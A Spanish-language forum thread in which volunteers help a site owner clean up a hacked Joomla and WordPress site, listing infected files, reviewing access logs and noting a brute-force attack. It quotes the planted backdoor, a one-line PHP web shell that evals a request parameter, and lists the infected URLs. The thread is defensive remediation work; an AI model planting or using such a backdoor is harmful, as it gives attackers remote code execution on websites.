Mi Wordpress Hackeado

Iniciado por ka0s, 24 Julio 2014, 18:59 PM

0 Miembros y 3 Visitantes están viendo este tema.

ka0s

Cita de: #!drvy en 25 Julio 2014, 04:50 AM
Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código (php) [Seleccionar]
<?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos

MUCHAS GRACIAS POR LA ACLARACIÓN Y POR TODO. Como dijo MinusFour, espero que esa línea no la utilicen para nada no?

Cita de: MinusFour en 25 Julio 2014, 04:54 AM
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.

Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.

Del mismo archivo dices o de cual?
Debo comentarlas tambien como hizo arriba !#drvy??

#!drvy

@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=


Saludos

ka0s

Cita de: #!drvy en 25 Julio 2014, 05:00 AM
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=


Saludos

Uff, que mal. Tienes razón con que es un nido de malware esto!!
Debo comentarlas como has hecho tu o lo estás modificando vos?
Como tienes el acceso no se si solo lo ves, o lo estás modificando jajaj. Avisame asi si no lo modificas tu, lo hago yo.
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...

#!drvy

CitarDebo comentarlas como has hecho tu o lo estás modificando vos?

He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

CitarIgualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

MinusFour

Cita de: #!drvy en 25 Julio 2014, 05:06 AM
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

¿Crees que haya más backdoors por ahi? Si quieres le doy un vistazo.

ka0s

Cita de: #!drvy en 25 Julio 2014, 05:06 AM
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

Y bueno entonces si ya está todo al parecer? Creo que debería estar todo OK y sin problemas, espero que por un buen tiempo
Que no venga MinusFour a decir unas líneas más jajajaja.
He actualizado el Joomla de peritaje de arte a la versión 3.3.2 (La última que me recomendaba!!!)

Si hemos terminado aqui, quiero darle las gracias por todo su tiempo, esfuerzo y dedicación para un "desconocido" como yo. Tanto a ti como a MinusFour, sin duda, valoro muchísimo su tiempo y les agradezco de corazón la ayuda prestada!!!

Si estarían por aqui los invitaría una cerveza a cada uno xDD.

Bueno espero que hayamos terminado, Y MIL GRACIAS!!

#!drvy

En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos".

Dile a tu amiga que te lo pague bien xD


Saludos

MinusFour

Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.

ka0s

Cita de: MinusFour en 25 Julio 2014, 07:46 AM
Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.

Y bueno, esto es una lotería igual. Con todo lo que tocamos ayer, espero que haya "tapado" al menos por un tiempo. El Wordpress y el Joomla están actualizados. #!drvy
pudo limpiar los virus y creo que estaría todo "OK".

O que más aconsejan? Moverle el login a otra parte? o algo así?
Los sigo escuchando muchachos. GRACIAS!

MinusFour

#99
Lo único que recomiendo es que los admins y usuarios con permisos tengan passwords únicas y seguras. De las urls de joomla no pude encontrar nada más, las examine todas porque eran pocas y fuera de esas entradas raras no encontre nada.

De wordpress muchas llamadas a un archivo systemcash.php y me parece que dijo #!drvy que lo habían borrado. Puede ser que el archivo haya sido subido por FTP pero obviamente esto no aparecera en el log de apache.

Esto lo he visto en otro foro, posts desde hace un mes:

CitarWe recently saw this exact named file show up on a few wordpress sites. In every case it was uploaded via FTP login.

http://www.webhostingtalk.com/showthread.php?t=1387485